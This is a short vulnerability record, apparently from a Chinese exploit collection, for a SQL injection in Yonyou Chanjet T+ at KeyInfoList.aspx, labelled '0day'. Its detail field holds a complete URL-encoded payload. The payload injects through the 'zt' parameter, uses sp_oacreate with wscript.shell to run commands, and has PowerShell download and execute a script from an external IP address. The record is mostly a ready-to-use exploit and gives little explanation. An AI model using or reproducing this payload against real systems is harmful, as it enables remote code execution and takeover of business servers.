vendor = "用友"
name = "用友 畅捷通T+Load处存在SQL注入"
type = "SQL注入"
version = "未知"
path = "//tplus/UFAQD/KeyInfoList.aspx"
detail = "//tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=%27);declare%20%40shell%20int%3Bexec%20sp_oacreate%20%22wscript.shell%22%2C%40shell%20output%3Bexec%20sp_oamethod%20%40shell%2C%22run%22%2Cnull%2C%22sqlps%20IEX%20((new-object%20net.webclient).downloadstring('http%3A%2F%2F103.199.106.62%3A6000%2Fbeta'))%22%3b--+"
fix = "某厂商情报，实际24年洞"
date = "0702"
label = "0day"
verifier = "AdySec"
